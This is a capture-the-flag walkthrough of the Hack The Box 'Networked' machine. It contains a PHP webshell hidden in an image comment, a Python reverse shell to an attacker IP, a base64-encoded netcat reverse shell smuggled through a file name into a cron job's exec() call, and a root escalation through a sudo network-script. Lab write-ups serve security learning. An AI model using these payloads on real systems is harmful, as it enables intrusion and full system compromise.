Networked (Easy)

Enumeration

Nmap

nmap -sC -sV -oA nmap/Networked 10.129.88.105 -Pn

# Nmap 7.92 scan initiated Wed Jun  8 02:00:26 2022 as: nmap -sC -sV -oA nmap/Networked -Pn 10.129.88.235
Nmap scan report for 10.129.88.235
Host is up (0.22s latency).
Not shown: 971 filtered tcp ports (no-response), 26 filtered tcp ports (host-unreach)
PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
|   256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_  256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp  open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
443/tcp closed https

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jun  8 02:01:06 2022 -- 1 IP address (1 host up) scanned in 39.29 seconds

We can navigate to port 80

if we view the source, we can see some interesting comment

I tried the upload, /uploads, upload.php and gallery.php and I found out /uploads and upload.php did redirect to a new page.

Gobuster

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.129.88.235/

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.88.235/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/06/08 02:38:34 Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 237] [--> http://10.129.88.235/uploads/]
/backup               (Status: 301) [Size: 236] [--> http://10.129.88.235/backup/] 
[!] Keyboard interrupt detected, terminating.
                                                                                   
===============================================================
2022/06/08 02:52:35 Finished
===============================================================

If we navigate to /backup, we can see there is a backup.tar file that exists on the page.

Download the file and extract it.

After inspecting the file, I decided to bypass the upload by using a trick where injecting a php comment to the image.

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' ss.png

Then we can upload it to the web application.

Image successfully uploaded.

Proceed to view the image individually.

Supply a GET parameter "cmd" to the end of the URL and pass in any comments.

We can then proceed to make a reverse shell.

export RHOST="10.10.14.103";export RPORT=4444;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

If we navigate to the home directory, we can see that we are not able to read the user.txt as we need to escalate our privilege to Guly user first.

At the home directory of guly, we can see there are some interesting files.

Crontab.guly

*/3 * * * * php /home/guly/check_attack.php

Check_attack.php

<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
        $msg='';
  if ($value == 'index.html') {
        continue;
  }
  #echo "-------------\n";

  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}

?>

We can see every 3 minutes the crontab would execute the check_attack.php.

After investigating the code of check_attack.php, we can see there is a vulnerability here at this line.

exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");

We can see it concatenante the $path value and $value variable value together. Turns out, we can actually modify the $value variable.

What the script does is remove the file that is not supposed in the directory path.

What we can do is create a file with a name like this.

1; echo cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDEwLjEwLjE0LjEwMyA0NDQ1ID4vdG1wL2Y= | base64 -d | sh; 1

Fire up a listener shell. Wait for 3 minutes to get a respond.

Privilege Escalation

sudo -l to check whether guly can execute what command or script as sudo.

We can see there is a file named changename.sh

#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
        echo "interface $var:"
        read x
        while [[ ! $x =~ $regexp ]]; do
                echo "wrong input, try again"
                echo "interface $var:"
                read x
        done
        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
  
/sbin/ifup guly0

We can see the script takes a few inputs from the user.

We can see it overwrites the value inside the file after taking the input.

If we supply inputs that with spaces, we will receive some errors like this.

Immediately I know what I should input and that's bash to get a root bash!

Navigate to root.txt

Contrats!